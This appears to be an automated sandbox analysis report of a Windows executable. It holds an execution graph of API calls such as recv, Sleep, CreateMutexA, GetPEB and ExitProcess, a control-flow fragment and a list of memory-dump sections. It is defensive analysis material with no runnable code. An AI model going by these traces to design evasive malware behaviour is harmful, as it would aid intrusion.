                                                                                                                                                                                                                                execution_graph 10146 709ef0 10147 709f0c 10146->10147 10148 70c68b __Mtx_init_in_situ 2 API calls 10147->10148 10149 709f17 10148->10149 10228 6f5cad 10230 6f5caf __cftof 10228->10230 10229 6f5d17 shared_ptr __floor_pentium4 10230->10229 10231 6f5c10 3 API calls 10230->10231 10232 6f66ac 10231->10232 10233 6f5c10 3 API calls 10232->10233 10234 6f66b1 10233->10234 10235 6f22c0 3 API calls 10234->10235 10236 6f66c9 shared_ptr 10235->10236 10237 6f5c10 3 API calls 10236->10237 10238 6f673d 10237->10238 10239 6f22c0 3 API calls 10238->10239 10241 6f6757 shared_ptr 10239->10241 10240 6f5c10 3 API calls 10240->10241 10241->10240 10242 6f22c0 3 API calls 10241->10242 10243 6f6852 shared_ptr __floor_pentium4 10241->10243 10242->10241 10456 6f9ba5 10457 6f9ba7 10456->10457 10458 6f5c10 3 API calls 10457->10458 10459 6f9cb1 10458->10459 10460 6f8b30 3 API calls 10459->10460 10461 6f9cc2 10460->10461 10462 728bbe 10463 728868 3 API calls 10462->10463 10464 728bdc 10463->10464 10244 6f20a0 10245 70c68b __Mtx_init_in_situ 2 API calls 10244->10245 10246 6f20ac 10245->10246 10334 6f4120 10335 6f416a 10334->10335 10337 6f41b2 Concurrency::details::_ContextCallback::_CallInContext __floor_pentium4 10335->10337 10338 6f3ee0 10335->10338 10339 6f3f1e 10338->10339 10340 6f3f48 10338->10340 10339->10337 10341 6f3f58 10340->10341 10344 6f2c00 10340->10344 10341->10337 10345 6f2c0e 10344->10345 10351 70b847 10345->10351 10347 6f2c42 10348 6f2c49 10347->10348 10357 6f2c80 10347->10357 10348->10337 10350 6f2c58 Concurrency::cancel_current_task 10352 70b854 10351->10352 10355 70b873 Concurrency::details::_Reschedule_chore 10351->10355 10360 70cb77 10352->10360 10354 70b864 10354->10355 10362 70b81e 10354->10362 10355->10347 10368 70b7fb 10357->10368 10359 6f2cb2 shared_ptr 10359->10350 10361 70cb92 CreateThreadpoolWork 10360->10361 10361->10354 10364 70b827 Concurrency::details::_Reschedule_chore 10362->10364 10366 70cdcc 10364->10366 10365 70b841 10365->10355 10367 70cde1 TpPostWork 10366->10367 10367->10365 10369 70b807 10368->10369 10370 70b817 10368->10370 10369->10370 10372 70ca78 10369->10372 10370->10359 10373 70ca8d TpReleaseWork 10372->10373 10373->10370 10406 6f3fe0 10407 6f4022 10406->10407 10408 6f408c 10407->10408 10409 6f40d2 10407->10409 10412 6f4035 __floor_pentium4 10407->10412 10413 6f35e0 10408->10413 10410 6f3ee0 3 API calls 10409->10410 10410->10412 10414 6f3616 10413->10414 10417 6f364e Concurrency::cancel_current_task shared_ptr __floor_pentium4 10414->10417 10419 6f2ce0 10414->10419 10416 6f369e 10416->10417 10418 6f2c00 3 API calls 10416->10418 10417->10412 10418->10417 10420 6f2d1d 10419->10420 10421 70bedf InitOnceExecuteOnce 10420->10421 10422 6f2d46 10421->10422 10423 6f2d51 __floor_pentium4 10422->10423 10424 6f2d88 10422->10424 10428 70bef7 10422->10428 10423->10416 10426 6f2440 3 API calls 10424->10426 10427 6f2d9b 10426->10427 10427->10416 10429 70bf03 Concurrency::cancel_current_task 10428->10429 10430 70bf73 10429->10430 10431 70bf6a 10429->10431 10433 6f2ae0 4 API calls 10430->10433 10435 70be7f 10431->10435 10434 70bf6f 10433->10434 10434->10424 10436 70cc31 InitOnceExecuteOnce 10435->10436 10437 70be97 10436->10437 10438 70be9e 10437->10438 10439 726cbb 3 API calls 10437->10439 10438->10434 10440 70bea7 10439->10440 10440->10434 9695 6fcc79 9696 6fcc84 shared_ptr 9695->9696 9697 6fccda shared_ptr __floor_pentium4 9696->9697 9701 6f5c10 9696->9701 9699 6fce9d 9719 6fca70 9699->9719 9702 6f5c54 9701->9702 9729 6f4b30 9702->9729 9704 6f5d17 shared_ptr __floor_pentium4 9704->9699 9705 6f5c7b __cftof 9705->9704 9706 6f5c10 3 API calls 9705->9706 9707 6f66ac 9706->9707 9708 6f5c10 3 API calls 9707->9708 9709 6f66b1 9708->9709 9733 6f22c0 9709->9733 9711 6f66c9 shared_ptr 9712 6f5c10 3 API calls 9711->9712 9713 6f673d 9712->9713 9714 6f22c0 3 API calls 9713->9714 9715 6f6757 shared_ptr 9714->9715 9716 6f5c10 3 API calls 9715->9716 9717 6f22c0 3 API calls 9715->9717 9718 6f6852 shared_ptr __floor_pentium4 9715->9718 9716->9715 9717->9715 9718->9699 9720 6fcadd 9719->9720 9721 6fcc87 9720->9721 9722 6f5c10 3 API calls 9720->9722 9723 6fccda shared_ptr __floor_pentium4 9721->9723 9726 6f5c10 3 API calls 9721->9726 9724 6fccf9 9722->9724 9969 6f9030 9724->9969 9727 6fce9d 9726->9727 9728 6fca70 3 API calls 9727->9728 9731 6f4ce5 9729->9731 9732 6f4b92 9729->9732 9731->9705 9732->9731 9736 726da6 9732->9736 9853 6f2280 9733->9853 9737 726dc2 9736->9737 9738 726db4 9736->9738 9737->9732 9741 726d19 9738->9741 9746 72690a 9741->9746 9745 726d3d 9745->9732 9747 72692a 9746->9747 9749 726921 9746->9749 9747->9749 9760 72a671 9747->9760 9754 726d52 9749->9754 9755 726d8f 9754->9755 9757 726d5f 9754->9757 9845 72b67d 9755->9845 9758 726d6e 9757->9758 9840 72b6a1 9757->9840 9758->9745 9764 72a67b __dosmaperr __freea 9760->9764 9761 72694a 9765 72b5fb 9761->9765 9764->9761 9773 728bec 9764->9773 9766 72b60e 9765->9766 9768 726960 9765->9768 9766->9768 9799 72f5ab 9766->9799 9769 72b628 9768->9769 9770 72b650 9769->9770 9771 72b63b 9769->9771 9770->9749 9771->9770 9806 72e6b1 9771->9806 9774 728bf1 __cftof 9773->9774 9775 728bfc __cftof 9774->9775 9779 72d634 9774->9779 9793 7265ed 9775->9793 9781 72d640 __cftof __dosmaperr 9779->9781 9780 72d69c __dosmaperr ___std_exception_copy 9780->9775 9781->9780 9782 72d726 9781->9782 9783 72d81b __cftof 9781->9783 9785 72d751 __cftof 9781->9785 9782->9785 9796 72d62b 9782->9796 9784 7265ed __cftof 3 API calls 9783->9784 9786 72d82e 9784->9786 9785->9780 9789 72a671 __cftof 3 API calls 9785->9789 9791 72d7a5 9785->9791 9789->9791 9790 72d62b __cftof 3 API calls 9790->9785 9791->9780 9792 72a671 __cftof 3 API calls 9791->9792 9792->9780 9794 7264c7 __cftof 3 API calls 9793->9794 9795 7265fe 9794->9795 9797 72a671 __cftof 3 API calls 9796->9797 9798 72d630 9797->9798 9798->9790 9800 72f5b7 __cftof 9799->9800 9801 72a671 __cftof 3 API calls 9800->9801 9803 72f5c0 __cftof 9801->9803 9802 72f606 9802->9768 9803->9802 9804 728bec __cftof 3 API calls 9803->9804 9805 72f62b 9804->9805 9807 72a671 __cftof 3 API calls 9806->9807 9808 72e6bb 9807->9808 9811 72e5c9 9808->9811 9810 72e6c1 9810->9770 9815 72e5d5 __cftof __freea 9811->9815 9812 72e5f6 9812->9810 9813 728bec __cftof 3 API calls 9814 72e668 9813->9814 9816 72e6a4 9814->9816 9820 72a72e 9814->9820 9815->9812 9815->9813 9816->9810 9821 72a739 __dosmaperr __freea 9820->9821 9822 728bec __cftof 3 API calls 9821->9822 9824 72a7be 9821->9824 9823 72a7c7 9822->9823 9825 72e4b0 9824->9825 9826 72e5c9 __cftof 3 API calls 9825->9826 9827 72e4c3 9826->9827 9832 72e259 9827->9832 9829 72e4cb __cftof 9831 72e4dc __cftof __dosmaperr __freea 9829->9831 9835 72e6c4 9829->9835 9831->9816 9833 72690a __cftof GetPEB ExitProcess GetPEB 9832->9833 9834 72e26b 9833->9834 9834->9829 9836 72e259 __cftof GetPEB ExitProcess GetPEB 9835->9836 9839 72e6e4 __cftof 9836->9839 9837 72e75a __cftof __floor_pentium4 9837->9831 9838 72e32f __cftof GetPEB ExitProcess GetPEB 9838->9837 9839->9837 9839->9838 9841 72690a __cftof 3 API calls 9840->9841 9842 72b6be 9841->9842 9844 72b6ce __floor_pentium4 9842->9844 9850 72f1bf 9842->9850 9844->9758 9846 72a671 __cftof 3 API calls 9845->9846 9847 72b688 9846->9847 9848 72b5fb __cftof 3 API calls 9847->9848 9849 72b698 9848->9849 9849->9758 9851 72690a __cftof 3 API calls 9850->9851 9852 72f1df __cftof __freea __floor_pentium4 9851->9852 9852->9844 9854 6f2296 9853->9854 9857 7287f8 9854->9857 9860 727609 9857->9860 9859 6f22a4 9859->9711 9861 727649 9860->9861 9865 727631 __dosmaperr ___std_exception_copy __floor_pentium4 9860->9865 9862 72690a __cftof 3 API calls 9861->9862 9861->9865 9863 727661 9862->9863 9866 727bc4 9863->9866 9865->9859 9868 727bd5 9866->9868 9867 727be4 __dosmaperr ___std_exception_copy 9867->9865 9868->9867 9873 728168 9868->9873 9878 727dc2 9868->9878 9883 727de8 9868->9883 9893 727f36 9868->9893 9874 728171 9873->9874 9876 728178 9873->9876 9902 727b50 9874->9902 9876->9868 9877 728177 9877->9868 9879 727dcb 9878->9879 9881 727dd2 9878->9881 9880 727b50 3 API calls 9879->9880 9882 727dd1 9880->9882 9881->9868 9882->9868 9884 727e09 __dosmaperr ___std_exception_copy 9883->9884 9886 727def 9883->9886 9884->9868 9885 727f69 9890 727f77 9885->9890 9892 727f8b 9885->9892 9920 728241 9885->9920 9886->9884 9886->9885 9888 727fa2 9886->9888 9886->9890 9888->9892 9916 728390 9888->9916 9890->9892 9924 7286ea 9890->9924 9892->9868 9894 727f69 9893->9894 9895 727f4f 9893->9895 9896 728241 3 API calls 9894->9896 9899 727f77 9894->9899 9901 727f8b 9894->9901 9895->9894 9897 727fa2 9895->9897 9895->9899 9896->9899 9898 728390 3 API calls 9897->9898 9897->9901 9898->9899 9900 7286ea 3 API calls 9899->9900 9899->9901 9900->9901 9901->9868 9903 727b62 __dosmaperr 9902->9903 9906 728ab6 9903->9906 9905 727b85 __dosmaperr 9905->9877 9907 728ad1 9906->9907 9910 728868 9907->9910 9909 728adb 9909->9905 9911 72887a 9910->9911 9912 72690a __cftof GetPEB ExitProcess GetPEB 9911->9912 9915 72888f __dosmaperr ___std_exception_copy 9911->9915 9914 7288bf 9912->9914 9913 726d52 GetPEB ExitProcess GetPEB 9913->9914 9914->9913 9914->9915 9915->9909 9917 7283ab 9916->9917 9918 7283dd 9917->9918 9928 72c88e 9917->9928 9918->9890 9921 72825a 9920->9921 9935 72d3c8 9921->9935 9923 72830d 9923->9890 9923->9923 9925 72875d __floor_pentium4 9924->9925 9927 728707 9924->9927 9925->9892 9926 72c88e __cftof 3 API calls 9926->9927 9927->9925 9927->9926 9931 72c733 9928->9931 9930 72c8a6 9930->9918 9932 72c743 9931->9932 9933 72690a __cftof GetPEB ExitProcess GetPEB 9932->9933 9934 72c748 __cftof __dosmaperr ___std_exception_copy 9932->9934 9933->9934 9934->9930 9937 72d3ee 9935->9937 9947 72d3d8 __dosmaperr ___std_exception_copy 9935->9947 9936 72d485 9939 72d4e4 9936->9939 9940 72d4ae 9936->9940 9937->9936 9938 72d48a 9937->9938 9937->9947 9948 72cbdf 9938->9948 9965 72cef8 9939->9965 9942 72d4b3 9940->9942 9943 72d4cc 9940->9943 9954 72d23e 9942->9954 9961 72d0e2 9943->9961 9947->9923 9949 72cbf1 9948->9949 9950 72690a __cftof GetPEB ExitProcess GetPEB 9949->9950 9951 72cc05 9950->9951 9952 72cef8 GetPEB ExitProcess GetPEB 9951->9952 9953 72cc0d __alldvrm __cftof __dosmaperr ___std_exception_copy _strrchr 9951->9953 9952->9953 9953->9947 9956 72d26c 9954->9956 9955 72d2a5 9955->9947 9956->9955 9957 72d2de 9956->9957 9959 72d2b7 9956->9959 9958 72cf9a GetPEB ExitProcess GetPEB 9957->9958 9958->9955 9960 72d16d GetPEB ExitProcess GetPEB 9959->9960 9960->9955 9962 72d10f 9961->9962 9963 72d16d GetPEB ExitProcess GetPEB 9962->9963 9964 72d14e 9962->9964 9963->9964 9964->9947 9966 72cf10 9965->9966 9967 72cf75 9966->9967 9968 72cf9a GetPEB ExitProcess GetPEB 9966->9968 9967->9947 9968->9967 9970 6f907f 9969->9970 9971 6f5c10 3 API calls 9970->9971 9972 6f909a shared_ptr __floor_pentium4 9971->9972 9972->9721 10247 6f9ab8 10249 6f9acc 10247->10249 10250 6f9b08 10249->10250 10251 6f5c10 3 API calls 10250->10251 10252 6f9b7c 10251->10252 10253 6f8b30 3 API calls 10252->10253 10254 6f9b8d 10253->10254 10255 6f5c10 3 API calls 10254->10255 10256 6f9cb1 10255->10256 10257 6f8b30 3 API calls 10256->10257 10258 6f9cc2 10257->10258 9973 6f4276 9976 6f2410 9973->9976 9975 6f427f 9977 6f2424 9976->9977 9980 70b52d 9977->9980 9988 723aed 9980->9988 9982 6f242a 9982->9975 9983 70b5a5 ___std_exception_copy 9995 70b1ad 9983->9995 9985 70b598 9991 70af56 9985->9991 9999 724f29 9988->9999 9992 70af9f ___std_exception_copy 9991->9992 9994 70afb2 shared_ptr 9992->9994 10006 70b39f 9992->10006 9994->9982 9996 70b1e1 shared_ptr 9995->9996 9997 70b1d8 9995->9997 9996->9982 9998 70b39f 4 API calls 9997->9998 9998->9996 10001 724f2e __cftof 9999->10001 10000 70b555 10000->9982 10000->9983 10000->9985 10001->10000 10002 72d634 __cftof 3 API calls 10001->10002 10005 728bfc __cftof 10001->10005 10002->10005 10003 7265ed __cftof 3 API calls 10004 728c2f 10003->10004 10005->10003 10017 70bedf 10006->10017 10009 70b3e8 10009->9994 10026 70cc31 10017->10026 10020 726cbb 10021 726cc7 __cftof 10020->10021 10022 72a671 __cftof 3 API calls 10021->10022 10025 726ccc 10022->10025 10023 728bec __cftof 3 API calls 10024 726cf6 10023->10024 10025->10023 10027 70b3e1 10026->10027 10028 70cc3f InitOnceExecuteOnce 10026->10028 10027->10009 10027->10020 10028->10027 9674 726629 9677 7264c7 9674->9677 9678 7264d5 __cftof 9677->9678 9679 726520 9678->9679 9682 72652b 9678->9682 9681 72652a 9688 72a302 GetPEB 9682->9688 9684 726535 9685 72654a __cftof 9684->9685 9686 72653a GetPEB 9684->9686 9687 726562 ExitProcess 9685->9687 9686->9685 9689 72a31c __cftof 9688->9689 9689->9684 10259 6f42b0 10262 6f3ac0 10259->10262 10261 6f42bb shared_ptr 10263 6f3af9 10262->10263 10264 6f3b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 10263->10264 10265 6f3c38 10263->10265 10267 6f32d0 5 API calls 10263->10267 10264->10261 10266 6f32d0 5 API calls 10265->10266 10269 6f3c5f 10265->10269 10266->10269 10267->10265 10268 6f3c68 10268->10261 10269->10268 10270 6f3810 3 API calls 10269->10270 10271 6f3cdb shared_ptr 10270->10271 10271->10261 10301 6f3970 10302 70c68b __Mtx_init_in_situ 2 API calls 10301->10302 10303 6f39a7 10302->10303 10304 70c68b __Mtx_init_in_situ 2 API calls 10303->10304 10305 6f39e6 10304->10305 10306 6f2170 10309 70c6fc 10306->10309 10308 6f217a 10310 70c724 10309->10310 10311 70c70c 10309->10311 10310->10308 10311->10310 10313 70cfbe 10311->10313 10314 70ccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 10313->10314 10315 70cfd0 10314->10315 10315->10311 10441 6f55f0 10442 6f5610 10441->10442 10443 6f22c0 3 API calls 10442->10443 10444 6f5710 __floor_pentium4 10442->10444 10443->10442 10445 6f43f0 10446 70bedf InitOnceExecuteOnce 10445->10446 10447 6f440a 10446->10447 10448 6f4411 10447->10448 10449 726cbb 3 API calls 10447->10449 10450 6f4424 10449->10450 10272 6f3c8e 10273 6f3c98 10272->10273 10274 6f2410 4 API calls 10273->10274 10275 6f3ca5 10273->10275 10274->10275 10276 6f3810 3 API calls 10275->10276 10277 6f3ccf 10276->10277 10278 6f3810 3 API calls 10277->10278 10279 6f3cdb shared_ptr 10278->10279 10393 70d111 10394 70d121 10393->10394 10395 70d12a 10394->10395 10397 70d199 10394->10397 10398 70d1a7 SleepConditionVariableCS 10397->10398 10400 70d1c0 10397->10400 10398->10400 10400->10394 10030 6f3c47 10031 6f3c51 10030->10031 10034 6f3c5f 10031->10034 10037 6f32d0 10031->10037 10032 6f3c68 10034->10032 10056 6f3810 10034->10056 10060 70c6ac 10037->10060 10039 6f336b 10066 70c26a 10039->10066 10041 6f3314 10041->10039 10042 6f333c __Mtx_unlock 10041->10042 10063 70bd4c 10041->10063 10044 70c26a 4 API calls 10042->10044 10045 6f3350 __floor_pentium4 10042->10045 10046 6f3377 10044->10046 10045->10034 10047 70c6ac GetSystemTimePreciseAsFileTime 10046->10047 10048 6f33af 10047->10048 10049 70c26a 4 API calls 10048->10049 10050 6f33b6 __Cnd_broadcast 10048->10050 10049->10050 10051 70c26a 4 API calls 10050->10051 10052 6f33d7 __Mtx_unlock 10050->10052 10051->10052 10053 70c26a 4 API calls 10052->10053 10054 6f33eb 10052->10054 10055 6f340e 10053->10055 10054->10034 10055->10034 10057 6f381c 10056->10057 10103 6f2440 10057->10103 10070 70c452 10060->10070 10062 70c6b9 10062->10041 10087 70bb72 10063->10087 10065 70bd5c 10065->10041 10067 70c292 10066->10067 10068 70c274 10066->10068 10067->10067 10068->10067 10093 70c297 10068->10093 10071 70c4a8 10070->10071 10073 70c47a __floor_pentium4 10070->10073 10071->10073 10076 70cf6b 10071->10076 10073->10062 10074 70c4fd __Xtime_diff_to_millis2 10074->10073 10075 70cf6b _xtime_get GetSystemTimePreciseAsFileTime 10074->10075 10075->10074 10077 70cf87 __aulldvrm 10076->10077 10078 70cf7a 10076->10078 10077->10074 10078->10077 10080 70cf44 10078->10080 10083 70cbea 10080->10083 10084 70cbfb GetSystemTimePreciseAsFileTime 10083->10084 10086 70cc07 10083->10086 10084->10086 10086->10077 10088 70bb9c 10087->10088 10089 70cf6b _xtime_get GetSystemTimePreciseAsFileTime 10088->10089 10092 70bba4 __Xtime_diff_to_millis2 __floor_pentium4 10088->10092 10090 70bbcf __Xtime_diff_to_millis2 10089->10090 10091 70cf6b _xtime_get GetSystemTimePreciseAsFileTime 10090->10091 10090->10092 10091->10092 10092->10065 10096 6f2ae0 10093->10096 10095 70c2ae Concurrency::cancel_current_task 10097 70bedf InitOnceExecuteOnce 10096->10097 10098 6f2af4 __cftof 10097->10098 10098->10095 10099 72a671 __cftof 3 API calls 10098->10099 10102 726ccc 10099->10102 10100 728bec __cftof 3 API calls 10101 726cf6 10100->10101 10102->10100 10106 70b5d6 10103->10106 10105 6f2472 10108 70b5f1 Concurrency::cancel_current_task 10106->10108 10107 728bec __cftof 3 API calls 10109 70b69f 10107->10109 10108->10107 10110 70b658 __cftof __floor_pentium4 10108->10110 10110->10105 10326 6f9f44 10327 6f9f4c shared_ptr 10326->10327 10328 6fa953 Sleep CreateMutexA 10327->10328 10330 6fa01f shared_ptr 10327->10330 10329 6fa98e 10328->10329 10119 6f2e00 10120 6f2e28 10119->10120 10123 70c68b 10120->10123 10126 70c3d5 10123->10126 10125 6f2e33 10127 70c3eb 10126->10127 10128 70c3e1 10126->10128 10127->10125 10129 70c3be 10128->10129 10130 70c39e 10128->10130 10139 70cd0a 10129->10139 10130->10127 10135 70ccd5 10130->10135 10133 70c3d0 10133->10125 10136 70cce3 InitializeCriticalSectionEx 10135->10136 10138 70c3b7 10135->10138 10136->10138 10138->10125 10140 70cd1f RtlInitializeConditionVariable 10139->10140 10140->10133 10150 6fe0c0 recv 10151 6fe122 recv 10150->10151 10152 6fe157 recv 10151->10152 10153 6fe191 10152->10153 10154 6fe2b3 __floor_pentium4 10153->10154 10155 70c6ac GetSystemTimePreciseAsFileTime 10153->10155 10156 6fe2ee 10155->10156 10157 70c26a 4 API calls 10156->10157 10158 6fe358 10157->10158 10159 6f2ec0 10160 6f2f7e GetCurrentThreadId 10159->10160 10161 6f2f06 10159->10161 10163 6f2fef 10160->10163 10164 6f2f94 10160->10164 10162 70c6ac GetSystemTimePreciseAsFileTime 10161->10162 10165 6f2f12 10162->10165 10164->10163 10169 70c6ac GetSystemTimePreciseAsFileTime 10164->10169 10166 6f301e 10165->10166 10172 6f2f1d __Mtx_unlock 10165->10172 10167 70c26a 4 API calls 10166->10167 10168 6f3024 10167->10168 10170 70c26a 4 API calls 10168->10170 10171 6f2fb9 10169->10171 10170->10171 10174 70c26a 4 API calls 10171->10174 10175 6f2fc0 __Mtx_unlock 10171->10175 10172->10168 10173 6f2f6f 10172->10173 10173->10160 10173->10163 10174->10175 10176 70c26a 4 API calls 10175->10176 10177 6f2fd8 __Cnd_broadcast 10175->10177 10176->10177 10177->10163 10178 70c26a 4 API calls 10177->10178 10179 6f303c 10178->10179 10180 70c6ac GetSystemTimePreciseAsFileTime 10179->10180 10188 6f3080 shared_ptr __Mtx_unlock 10180->10188 10181 6f31c5 10182 70c26a 4 API calls 10181->10182 10183 6f31cb 10182->10183 10184 70c26a 4 API calls 10183->10184 10185 6f31d1 10184->10185 10186 70c26a 4 API calls 10185->10186 10194 6f3193 __Mtx_unlock 10186->10194 10187 6f31a7 __floor_pentium4 10188->10181 10188->10183 10188->10187 10190 6f3132 GetCurrentThreadId 10188->10190 10189 70c26a 4 API calls 10191 6f31dd 10189->10191 10190->10187 10192 6f313b 10190->10192 10192->10187 10193 70c6ac GetSystemTimePreciseAsFileTime 10192->10193 10195 6f315f 10193->10195 10194->10187 10194->10189 10195->10181 10195->10185 10195->10194 10196 70bd4c GetSystemTimePreciseAsFileTime 10195->10196 10196->10195 10465 6f8980 10467 6f8aea 10465->10467 10468 6f89d8 shared_ptr 10465->10468 10466 6f5c10 3 API calls 10466->10468 10468->10466 10468->10467 10469 6f3f9f 10470 6f3fad 10469->10470 10471 6f3fb6 10469->10471 10472 6f2410 4 API calls 10470->10472 10472->10471 10200 6f9adc 10201 6f9aea 10200->10201 10205 6f9afe shared_ptr 10200->10205 10202 6fa917 10201->10202 10201->10205 10203 6fa953 Sleep CreateMutexA 10202->10203 10204 6fa98e 10203->10204 10206 6f5c10 3 API calls 10205->10206 10207 6f9b7c 10206->10207 10214 6f8b30 10207->10214 10209 6f9b8d 10210 6f5c10 3 API calls 10209->10210 10211 6f9cb1 10210->10211 10212 6f8b30 3 API calls 10211->10212 10213 6f9cc2 10212->10213 10215 6f8b7c 10214->10215 10216 6f5c10 3 API calls 10215->10216 10218 6f8b97 shared_ptr 10216->10218 10217 6f8d01 shared_ptr __floor_pentium4 10217->10209 10218->10217 10219 6f5c10 3 API calls 10218->10219 10221 6f8d9a shared_ptr 10219->10221 10220 6f8e7e shared_ptr __floor_pentium4 10220->10209 10221->10220 10222 6f5c10 3 API calls 10221->10222 10223 6f8f1a shared_ptr __floor_pentium4 10222->10223 10223->10209 10331 6f215a 10332 70c6fc InitializeCriticalSectionEx 10331->10332 10333 6f2164 10332->10333 10111 726a44 10112 726a5c 10111->10112 10114 726a52 10111->10114 10116 72698d 10112->10116 10115 726a76 __freea 10117 72690a __cftof 3 API calls 10116->10117 10118 72699f 10117->10118 10118->10115 10224 70d0c7 10225 70d0d6 10224->10225 10226 70d17f 10225->10226 10227 70d17b RtlWakeAllConditionVariable 10225->10227 9669 6fa856 9671 6fa870 9669->9671 9673 6fa892 shared_ptr 9669->9673 9670 6fa953 Sleep CreateMutexA 9672 6fa98e 9670->9672 9671->9670 9671->9673 10401 6f2b10 10402 6f2b1c 10401->10402 10403 6f2b1a 10401->10403 10404 70c26a 4 API calls 10402->10404 10405 6f2b22 10404->10405 10473 6f2b90 10474 6f2bce 10473->10474 10475 70b7fb TpReleaseWork 10474->10475 10476 6f2bdb shared_ptr __floor_pentium4 10475->10476

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 342 72652b-726538 call 72a302 345 72655a-72656c call 72656d ExitProcess 342->345 346 72653a-726548 GetPEB 342->346 346->345 347 72654a-726559 346->347 347->345
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ExitProcess.KERNEL32(?,?,0072652A,?,?,?,?,?,00727661), ref: 00726567
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.1806081800.00000000006F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806061991.00000000006F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806081800.0000000000752000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806150113.0000000000759000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806171298.000000000075B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806192043.0000000000767000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806342695.00000000008C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806363245.00000000008C2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806386286.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806403949.00000000008D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806427336.00000000008D8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806427336.00000000008E3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806507101.00000000008E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806532882.00000000008E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806556541.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806612445.00000000008FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806638457.0000000000912000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806747047.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806765856.000000000091B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806790332.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806814100.0000000000921000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806834399.0000000000928000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806859021.0000000000946000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806879560.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806901566.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806924869.0000000000954000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806950300.0000000000963000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806969215.0000000000968000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806994089.0000000000971000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807019732.0000000000975000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807038418.0000000000976000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807057673.0000000000979000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807075898.000000000097A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807097030.0000000000982000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807117306.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807135796.0000000000992000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807154292.0000000000994000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807174535.0000000000996000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807193439.000000000099E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807212159.00000000009A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807212159.00000000009C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807263134.00000000009ED000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807282308.00000000009EE000.00000040.00000001.01000000.00000007.sdmpDownload File
